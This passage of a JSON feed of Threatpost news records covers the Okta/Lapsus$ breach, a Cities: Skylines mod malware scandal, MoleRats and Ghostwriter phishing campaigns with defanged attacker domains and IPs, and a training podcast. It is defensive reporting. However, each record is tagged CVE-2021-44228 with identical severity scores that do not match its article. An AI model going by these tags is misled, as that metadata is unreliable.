\u201cIn assessing the potential extent of the compromise, it is important to remember that by design, Sitel\u2019s support engineers have limited access. They are unable to create or delete users, or download customer databases. Support engineers are able to facilitate the resetting of passwords and multi-factor authentication factors for users, but are unable to choose those passwords. In other words, an individual with this level of access could repeatedly trigger a password reset for users, but would not be able to log in to the service.\u201d\n\nBesides its attack on Okta, the precocious Lapsus$ gang \u2013 a group of data extortionists potentially [thinned out](<https://threatpost.com/uk-cops-collar-7-suspected-lapsus-gang-members/179098/>) by London police having collared seven suspected members last week \u2013 also posted some of Microsoft\u2019s source code and data about internal projects and systems around the same time as it shared Okta screenshots.\n\n## How Much Should We Blame Okta?\n\nSecurity specialists aren\u2019t jumping to blame Okta for its admitted \u201cmistake.\u201d The thinking: There but for the grace of God go us. \n\nAfter all, ATOs are common. How should an organization know which ones to consider as worthy of close inspection, and when should they follow up with a deeper dive to ensure the attempt wasn\u2019t successful? \n\nSounil Yu, chief information security officer at JupiterOne \u2013 provider of cyber asset management and governance technology \u2013 told Threatpost on Monday that these intrusions (or, rather, attempted intrusions, as the case may be) occur regularly, but the \u201cvast majority\u201d are beaten back before they have a serious impact or lead to further incidents.\n\n\u201cIt\u2019s easy in hindsight to understand the true severity of an incident, but hard in the present time,\u201d he said via email. 
\n\nChris Morgan, senior cyber threat intelligence analyst at digital risk protection firm Digital Shadows, explained that ATOs are \u201cincredibly common\u201d due to a combination of the effectiveness and availability of brute-force cracking tools and threat actors\u2019 ability to sell stolen accounts on cybercriminal forums. \n\n## What Should Trigger a Report?\n\nThe question of whether certain incidents are material enough to report \u201ccan be more art than science,\u201d Yu said. But the Okta case will probably cause many organizations to reconsider what ratings and thresholds they\u2019re applying to such incidents, he surmised, \u201cso that we are not seen as negligent in meeting our reporting obligations.\u201d\n\nKnowing when to conduct a more robust investigation depends on what facts are uncovered during the incident management process, along with the risk associated with the targeted account, Morgan said via email. \u201cAn account with significant privileges should be treated with a higher priority than those that [have] limited functionality,\u201d he advised.\n\nInitial triage of ATO attacks aims to identify key facts about what activity the account has been involved in, to accurately determine the risk and next steps, Morgan said. \u201cThis is typically done by checking authentication logs and observing login activity and includes spotting whether the account has attempted to login to additional services, changed any passwords, or downloaded external material,\u201d he continued. \u201cIt also includes activity that may have an impact on the overall risk, like whether the account has accessed sensitive data or attempted to establish persistence.\u201d\n\n## No \u2018God-like Access\u2019 Was Gained\n\nWhen the Okta breach first came to light, there was concern about a \u201csuperuser\u201d app pictured in Lapsus$ screenshots. Okta clarified on Friday that this was no \u201cSuper Admin\u201d account, as had been feared initially. 
Rather, it\u2019s an in-house application \u2013 known as SuperUser or SU \u2013 used by support staff to handle most queries. \n\n\u201cThis does not provide \u2018god-like access\u2019 to all its users,\u201d Okta Chief Security Officer David Bradbury explained. \u201cThis is an application built with least privilege in mind to ensure that support engineers are granted only the specific access they require to perform their roles.\u201d\n\nSpecifically, SuperUser engineers can\u2019t create or delete users or download customer databases. \n\nWhat SuperUsers can do: \u201cSupport engineers do have access to limited data \u2013 for example, Jira tickets and lists of users \u2013 that were seen in the screenshots,\u201d Bradbury clarified. \u201cSupport engineers are also able to facilitate the resetting of passwords and MFA factors for users, but are unable to obtain those passwords.\u201d\n\nThe fact that the Sitel account Lapsus$ took over was reportedly built with the principle of least privilege in mind \u201cshould have minimized the data and services that Lapsus$ were able to view,\u201d Morgan said, in response to Threatpost asking what Okta did right. \n\n\u201cOkta should also be praised for how quickly they identified and worked to lock down the compromised account,\u201d he added. \n\nHowever, clearly, that timeliness didn\u2019t extend to the forensic reporting and communication of the incident, as Okta itself has now admitted. \n\n**_Moving to the cloud? 
Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-28T18:28:34", "type": "threatpost", "title": "Okta Says It Goofed in Handling the Lapsus$ Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-28T18:28:34", "id": "THREATPOST:C9D2DB62AC17B411BFFF253D149E56F2", "href": "https://threatpost.com/okta-goofed-lapsus-attack/179129/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-14T17:51:33", "description": "The developer of several popular mods for the Cities: Skylines city-building game has been banned after malware was discovered hidden in their wares.\n\nThe modder, who goes by the handle Chaos as well 
as Holy Water, reportedly tucked an automatic updater into several mods that enabled the author to deliver malware to anybody who downloaded them.\n\nIt started last year, when Chaos launched a \u201credesigned\u201d version of Harmony: a core framework project that most Cities: Skylines mods rely on to work. The author went on to similarly rework other popular mods, and he listed his Harmony redo as a core download: in other words, players would be forced to download it to get dependent mods to work.\n\nBut an automatic updater was subsequently discovered, hidden away in Chaos\u2019 Harmony version \u2013 an updater that enabled the modder to deliver malware to the devices of those who downloaded it. As well, the author reportedly poisoned other mods with malicious code that bogged down game-play, forcing players to download yet more tainted mods that Chaos had created as \u201csolutions.\u201d\n\nAccording to a pinned post on the [Cities: Skylines subreddit](<https://old.reddit.com/r/CitiesSkylines/>), some, but not all, of Chaos\u2019 mods have been removed from the Steam Workshop, and the author\u2019s accounts have been suspended.\n\n## Players Urged to Trash the Mods\n\nThe subreddit moderator who posted the warning on Saturday \u2013 kjmci \u2013 urged players to scrub their systems of anything published by Chaos.\n\n\u201cWe recommend in the strongest possible terms that you unsubscribe from all items published by this author and do not subscribe, download, or install any mods, from any source, that may be published by this individual in future,\u201d according to the subreddit post.\n\n[Valve](<https://www.nme.com/brands/valve>) has reportedly yanked several of the mods that feed into the automatic updater and has banned Chaos\u2019 most recent accounts. 
However, as [NME](<https://www.nme.com/news/gaming-news/valve-bans-cities-skylines-modder-after-discovery-of-major-malware-risk-3159709>) reports, the modder\u2019s downloads now number around 35,000, meaning that the devices of tens of thousands of gamers have potentially been infected.\n\nChaos had developed several forks \u2013 i.e., modified and reuploaded versions \u2013 of popular mods from well-known creators, including Harmony, Network Extensions and Traffic Manager: President Edition.\n\n## Poisoning the Code Chain\n\nLacing Harmony with malware is particularly pernicious, given that it\u2019s one of the mods that Chaos \u201credesigned.\u201d Chaos listed the modified version as a core download, as in, a dependency for other mods that players would have to download in order for other dependent mods to work.\n\nAmong other functions, Harmony dishes out a patching library to mods that need it and hot-patches older Harmony versions \u2013 older versions that, according to Steam\u2019s [community page](<https://steamcommunity.com/workshop/filedetails/?id=2040656402>), are still in use by various mods.\n\n\u201cUsers install Harmony (redesigned) for a particular reason, suddenly they get errors in popular mods. The solution provided is to use [Chaos\u2019] versions,\u201d kjmci told NME. \u201cThose versions gain traction and users, and people come across them instead of the originals\u2026 and see Harmony (redesigned) marked as a dependency. Users install Harmony (redesigned) with the [automatic updating code] bundled with it. Suddenly you have tens of thousands of users who have effectively installed a trojan on their computer.\u201d\n\nThe automatic, malware-delivering updater was found buried in Chaos\u2019 version of Harmony, according to what kjmci told NME. 
The moderator opts for anonymity because they\u2019ve been targeted by Chaos in the past, they told the publication.\n\n## Some Mods Rigged with Performance-Slaying Malware\n\nBesides inflicting the trojan on unsuspecting players, Chaos also reportedly planted malicious code that targeted fellow modders and employees of the game\u2019s developer, Colossal Order.\n\nThis particular flavor of malware crippled game performance, according to kjmci. The resulting crummy game-play motivated users to download so-called \u201csolutions\u201d that Chaos advertised to help clear up the issues.\n\nFollowing their fans\u2019 complaints about the sluggish performance, the developers of the targeted mods investigated and discovered the malicious code.\n\n## Chaos Could Return\n\nJust because Valve pulled Chaos\u2019 accounts doesn\u2019t mean the modder won\u2019t be back to spread more malware. As NME notes, a loophole in [the workshop rules](<https://wiki.facepunch.com/gmod/Steam_Workshop_Rules>) for Steam \u2013 Valve\u2019s digital distribution service \u2013 could allow the author to keep working on mods from another account even if his current accounts stay banned.\n\nBesides which, just because Chaos was banned doesn\u2019t mean that the damage is done. It could, in fact, get a lot worse, kjmci said: \u201cWhat\u2019s been implemented would let him cryptolock a bunch of machines, create a botnet (and DDoS his enemies?) or mine cryptocurrency.\u201d\n\nDistributed denial-of-service (DDoS) attacks are far from novel in the gaming world. 
Last month, for example, a massive Minecraft tournament styled after the Netflix blockbuster Squid Game known as \u201cSquidCraft\u201d was attacked with a DDoS attack that [took down](<https://threatpost.com/cyberattacks-squid-game-minecraft-andorra-internet/177981/>) the sole (and state-owned) internet service provider in Andorra.\n\n## \u2018Classic\u2019 Supply Chain Attack\n\nJohn Bambenek, principal threat hunter at digital IT and security operations company Netenrich, noted that malware in games or in game mods \u2013 or even in pirated/cracked games, for that matter, is a fairly common tactic, \u201cone that often involves American and European actors.\u201d\n\nHe told Threatpost on Monday that using a supply chain tactic to get into more victims is \u201ca fairly new tactic,\u201d but unsurprising, given that \u201cour discussion of the potential massive risks of supply chain attacks have inspired new actors to adopt them.\u201d\n\nCasey Bisson, head of product and developer relations at code and security provider BluBracket, told Threatpost on Monday that this is a \u201cclassic software supply chain attack similar to what we\u2019ve seen elsewhere,\u201d the difference being how close it gets to the consumer end user.\n\n\u201cThere\u2019s lots of open source and commercially sourced software components that go into the apps and games on our mobile devices, but those supply chains are shorter and less complex relative to the components that can go into the software on servers or network devices,\u201d Bisson said via email. \u201cBut \u2018shorter and less complex\u2019 supply chains are still vulnerable.\n\n\u201cCode is a vast and unprotected attack surface, and there\u2019s no class of software that\u2019s immune from attack. 
The more consumers feel these attacks on their personal mobile devices, the more they\u2019ll demand protections.\u201d\n\nCompanies can get ahead of consumer demands by implementing automated security practices to ensure product safety, he suggested.\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-14T17:23:45", "type": "threatpost", "title": "'Cities: Skylines' Gaming Modder Banned Over Hidden Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-14T17:23:45", "id": "THREATPOST:7DDE7BA7A7916763BDDB5D0C565285DA", "href": "https://threatpost.com/cities-skylines-modder-banned-over-hidden-malware/178403/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-09T14:11:09", "description": "Known Palestinian threat actor MoleRats is likely behind a recent malicious email campaign targeting Middle Eastern governments, foreign-policy think tanks and a state-affiliated airline with a new intelligence-gathering trojan dubbed NimbleMamba, researchers said.\n\nResearchers from Proofpoint said they have observed a spear-phishing campaign using multiple vectors since November that they believe is the work of TA402, more [commonly known as](<https://threatpost.com/molerats-apt-espionage-facebook-dropbox/162162/>) MoleRats and linked to the Palestinian Territories, according to a [report](<https://www.proofpoint.com/us/blog/threat-insight/ugg-boots-4-sale-tale-palestinian-aligned-espionage>) posted online Tuesday.\n\nThe campaign uses various phishing lures and includes tactics not only to avoid being detected but also to ensure that its core malware payload only attacks specific targets, Proofpoint researchers wrote in the report. Some of the attacks observed by the team also delivered a secondary payload, a trojan dubbed BrittleBush, they said.\n\nNimbleMamba, delivered as an obfuscated .NET executable using third-party obfuscators, is an intelligence-gathering trojan researchers believe is a replacement for previous malware used by TA402, LastConn.\n\n\u201cNimbleMamba has the traditional capabilities of an intelligence-gathering trojan and is likely designed to be the initial access,\u201d researchers wrote. 
\u201cFunctionalities include capturing screenshots and obtaining process information from the computer. Additionally, it can detect user interaction, such as looking for mouse movement.\u201d\n\nMoleRats is part of the Gaza Cybergang, an Arabic-speaking, politically motivated collective of interrelated threat groups actively targeting the Middle East and North Africa. It\u2019s known for attacks using spyware and other malware aimed at gathering intelligence.\n\nResearchers from Zscaler have already observed MoleRats targeting prominent Palestinians, as well as activists and journalists in Turkey, with spyware [in a previously identified attack](<https://threatpost.com/molerats-apt-spy-bankers-politicians-journalists/177907/>) in January. That campaign used malicious files doctored up to look like legitimate content related to the Israeli-Palestine conflict.\n\n## **Variations of an Espionage Campaign**\n\nProofpoint outlined three types of emails using different tactics and URLs aimed at tricking victims into clicking on malicious links to download the ultimate payloads.\n\nOne, which they observed in November, shows MoleRats pretending to be the Quora website while using an actor-controlled Gmail account with an actor-controlled domain, they said.\n\nThe attack vector demonstrated a hallmark of the campaign, which is to use geofencing to target specific countries with the malicious payload rather than delivering it to everyone who clicks on the email\u2019s malicious link. The email appears to advertise Ugg boots for sale.\n\n\u201cThe malicious URL, such as https[:]//www[.]uggboots4sale[.]com/news15112021.php, in the phishing email was geofenced to the targeted countries,\u201d researchers wrote. \u201cIf the target\u2019s IP address fits into the targeted region, the user would be redirected to the .RAR file download containing the latest TA402 implant, NimbleMamba. 
If outside the target area, the user would be redirected to a legitimate news site.\u201d\n\nThe second variation, called \u201cDropbox URL,\u201d was observed in December using \u201cmultiple phishing pretenses, including clickbait medical lures and ones allegedly sharing confidential geopolitical information,\u201d researchers wrote.\n\nThis variation also used a Gmail account controlled by TA402 to send the email, but shifted to Dropbox URLs to deliver the malicious .RAR files containing NimbleMamba. It also abandoned the use of geofencing, they said.\n\nMoreover, in this variation, researchers noticed that the threat actor also was using the cloud-based file-sharing service Dropbox for malware command and control (C2), which prompted them to notify Dropbox of the malicious activity so they could put an end to it, they said. MoleRats was seen using Dropbox for C2 in its previously identified attacks in January.\n\nThe third email used by attackers, observed in December and January, used socially engineered content specifically to lure targets. 
However, in this variation, MoleRats \u201cslightly adjusted their attack chain by inserting an additional actor-controlled WordPress URL,\u201d researchers wrote.\n\nThe WordPress site impersonates a news aggregator of the legitimate news site used in the first campaign variation, and likely redirects to the download site of the malicious .RAR files containing NimbleMamba if someone in the targeted region clicks on the link, researchers said.\n\n\u201cIf the source IP address does not align with the target region, the URL will redirect the recipient to a benign website, typically an Arabic-language news website,\u201d they added.\n\n## **NimbleMamba in Depth**\n\nThe most frequently delivered payload of the campaign, NimbleMamba, shares some similarities with TA402\u2019s previously used deliverable, LastConn, but also has some notable differences, researchers observed.\n\nBoth executables are written in C#, have base64 encoding within the C2 framework and use the Dropbox API for C2 communication. However, there appears to be little code overlap between the two, they said.\n\nNimbleMamba\u2019s use of guardrails to ensure that all infected victims are within TA402\u2019s target region also is unique, as is its use of the Dropbox API for both C2 as well as exfiltration, researchers wrote in the post.\n\n\u201cThe malware also contains multiple capabilities designed to complicate both automated and manual analysis,\u201d they wrote. 
\u201cBased on this, Proofpoint assesses NimbleMamba is actively being developed, is well-maintained, and designed for use in highly targeted intelligence collection campaigns.\u201d\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-09T14:03:18", "type": "threatpost", "title": "MoleRats APT Flaunts New Trojan in Latest Cyberespionage Campaign", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-09T14:03:18", "id": "THREATPOST:5F6690E820E1B143D99DD5974300C6FF", "href": "https://threatpost.com/molerats-apt-trojan-cyberespionage-campaign/178305/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-31T18:15:01", "description": "Ghostwriter \u2013 a threat actor previously [linked](<https://www.mandiant.com/resources/unc1151-linked-to-belarus-government>) with the Belarusian Ministry of Defense \u2013 
has glommed onto the [recently disclosed](<https://threatpost.com/browser-in-the-browser-attack-makes-phishing-nearly-invisible/179014/>), nearly invisible \u201cBrowser-in-the-Browser\u201d (BitB) credential-phishing technique in order to continue its ongoing [exploitation](<https://threatpost.com/russian-apts-phishing-ukraine-google/178819/>) of the war in Ukraine.\n\nIn a Wednesday [post](<https://blog.google/threat-analysis-group/tracking-cyber-activity-eastern-europe/>), Google\u2019s Threat Analysis Group (TAG) said that they\u2019d already spotted BitB being used by multiple government-backed actors prior to the media turning a laser eye on BitB earlier this month. The fresh attention was triggered by a penetration tester and security researcher \u2013 who goes by the handle mr.d0x \u2013 who posted a [description](<https://mrd0x.com/browser-in-the-browser-phishing-attack/?no-cache=1>) of BitB.\n\nGhostwriter actors quickly picked up on BitB, combining it with another of the advanced persistent threat\u2019s (APT\u2019s) phishing techniques: namely, hosting credential-phishing landing pages on compromised sites.\n\n## BitB\n\nThe newly disclosed credential-phishing method of BitB takes advantage of third-party single sign-on ([SSO](<https://en.wikipedia.org/wiki/Single_sign-on>)) options embedded on websites that issue popup windows for authentication, such as \u201cSign in with Google,\u201d Facebook, Apple or Microsoft.\n\nThese days, SSO popups are a routine way to authenticate when you sign in.\n\nBut according to mr.d0x\u2019s post, completely fabricating a malicious version of a popup window is a snap: It\u2019s \u201cquite simple\u201d using basic HTML/CSS, the researcher said a few weeks ago. 
The concocted popups simulate a browser window within the browser, spoofing a legitimate domain and making it possible to stage convincing phishing attacks.\n\n\u201cCombine the window design with an iframe pointing to the malicious server hosting the phishing page, and [it\u2019s] basically indistinguishable,\u201d mr.d0x wrote at the time.\n\nJavaScript can make the window appear on a link, button click or page loading screen. As well, libraries \u2013 such as the popular JQuery JavaScript library \u2013 can make the window appear visually appealing.\n\n## BitB Credential Phishing on Compromised Sites\n\nIn Wednesday\u2019s post, TAG gave an example, shown below, of how Ghostwriter has taken to hosting credential phishing landing pages on compromised sites:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/31134025/Ghostwriter_BitB_example-e1648748440308.jpg>)\n\nExample of hosting credential phishing landing pages on compromised sites. Source: TAG.\n\nThe BitB technique shown above entails drawing a login page that appears to be on the passport.i.ua domain, over the page hosted on the compromised site. 
\u201cOnce a user provides credentials in the dialog, they are posted to an attacker controlled domain,\u201d TAG researchers said.\n\nTAG has recently observed Ghostwriter credential-phishing on these domains:\n\n * login-verification[.]top\n * login-verify[.]top\n * ua-login[.]top\n * secure-ua[.]space\n * secure-ua[.]top\n\n## Other Campaigns Launched by Government-Backed Actors in China, Iran, North Korea & Russia\n\nSince early March, Ghostwriter\u2019s use of BitB is only one of a trio of cyber aggressions that TAG [has been tracking](<https://blog.google/threat-analysis-group/update-threat-landscape-ukraine/>) with regards to Russia\u2019s invasion of Ukraine.\n\nThe use of the war as a lure in phishing and malware campaigns has continued to grow throughout the month, TAG said, with associated cyber-assaults coming in from government-backed actors from China, Iran, North Korea and Russia, as well as from various unattributed groups, according to TAG\u2019s Wednesday post.\n\nActors \u201chave used various Ukraine war-related themes in an effort to get targets to open malicious emails or click malicious links,\u201d TAG said.\n\n## Curious Gorge\n\nBesides Ghostwriter\u2019s BitB campaigns, TAG has spotted a group it\u2019s calling Curious Gorge that it attributes to China\u2019s PLA SSF conducting campaigns against government and military organizations in Ukraine, Russia, Kazakhstan and Mongolia.\n\n\u201cWhile this activity largely does not impact Google products, we remain engaged and are providing notifications to victim organizations,\u201d TAG advised.\n\nBelow is a list of IPs used in Curious Gorge campaigns that TAG has recently observed:\n\n * 5.188.108[.]119\n * 91.216.190[.]58\n * 103.27.186[.]23\n * 114.249.31[.]171\n * 45.154.12[.]167\n\n## COLDRIVER\n\nFinally, TAG has also observed COLDRIVER \u2013 a Russia-based threat actor, sometimes referred to as Calisto \u2013 that has launched credential-phishing campaigns targeting several United 
States-based NGOs and think tanks, the military of a Balkans country, and a Ukraine-based defense contractor.\n\nNow, however, for the first time, COLDRIVER is targeting the military of multiple Eastern European countries and a NATO Centre of Excellence, TAG reported.\n\nGoogle doesn\u2019t know how successful these campaigns have been, given that they were issued from newly created Gmail accounts to non-Google accounts. At any rate, Google hasn\u2019t seen any Gmail accounts successfully compromised because of these campaigns, TAG said.\n\nRecently observed COLDRIVER credential phishing domains:\n\n * protect-link[.]online\n * drive-share[.]live\n * protection-office[.]live\n * proton-viewer[.]com\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-31T18:09:07", "type": "threatpost", "title": "Belarusian \u2018Ghostwriter\u2019 Actor Picks Up BitB for Ukraine-Related Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-31T18:09:07", "id": "THREATPOST:41B10746D1F4B74DA188CB140A8B2676", "href": "https://threatpost.com/belarusian-ghostwriter-actor-picks-up-bitb-for-ukraine-related-attacks/179210/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-24T20:38:36", "description": "Log4j, ransomware, cloud vulnerabilities, phishing: Cyber threats are manifold. They all pale, however, in comparison to the security black holes that walk around on two legs.\n\nStudies have shown that nearly all successful breaches stem from human error, be it failure to install security patches before an attacker exploits a vulnerability, lousy passwords, or falling into the web of lies spun in [social engineering](<https://threatpost.com/aliens-ufos-frontier-social-engineers/162939/>) or [phishing](<https://threatpost.com/nft-investors-lose-1-7m-in-opensea-phishing-attack/178558/>) attacks.\n\nA 2020 report from Stanford University found that nine out of 10 data breaches are caused by users. Research from Stanford University and the security firm Tessian found that[ approximately 88 percent](<https://cisomag.eccouncil.org/psychology-of-human-error-could-help-businesses-prevent-security-breaches/>) of all data breaches are caused by an employee mistake. 
Similar studies have confirmed these results going back for years: A 2014 report from IBM [found](<https://thehackernews.com/2021/02/why-human-error-is-1-cyber-security.html#:~:text='Human%20error%20was%20a%20major,in%2095%25%20of%20all%20breaches.&text=Mitigation%20of%20human%20error%20must,cyber%20business%20security%20in%202021.>) that human error was \u201ca major contributing cause\u201d in 95 percent of all breaches.\n\n\n\n(Brought to you by SpecOps. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nAccording to IBM, the average cost of those breaches has been[ doubling yearly](<https://www.ibm.com/security/data-breach>) from 2020 to date. You can install cutting-edge artificial intelligence solutions or other modern anti-malware and threat detection software to detect anomalous behavior, but technical solutions only go so far, given that carbon-based life forms use them.\n\nHowever, these programs often aren\u2019t tailored to individuals\u2019 roles and responsibilities. They also tend to be boring. Darren Van Booven, lead principal consultant at Trustwave and cybersecurity training expert, visited the Threatpost podcast to talk about how the right cybersecurity awareness program should be conducted at the right pace by well-informed instructors.\n\nWhat also doesn\u2019t hurt: getting senior management to support decent cybersecurity training programs, bringing in notable speakers, making sure management is role-modeling good security hygiene, casting coworkers in cybersecurity awareness skits and/or passing out squeezie stress-balls shaped like phish.\n\nWhatever it takes!\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/022222_Trustwave_Darren_van_Boofen_mixdown.mp3>). 
For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-24T14:00:50", "type": "threatpost", "title": "The Art of Non-boring Cybersec Training\u2013Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-24T14:00:50", "id": "THREATPOST:95BDCA2096B58A0697E169C01B1E0F09", "href": "https://threatpost.com/the-art-of-non-boring-cybersec-training-podcast/178594/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-02T22:50:57", "description": "The TeaBot banking trojan \u2013 also known as \u201cAnatsa\u201d \u2013 has been spotted on the Google Play store, researchers from Cleafy have 
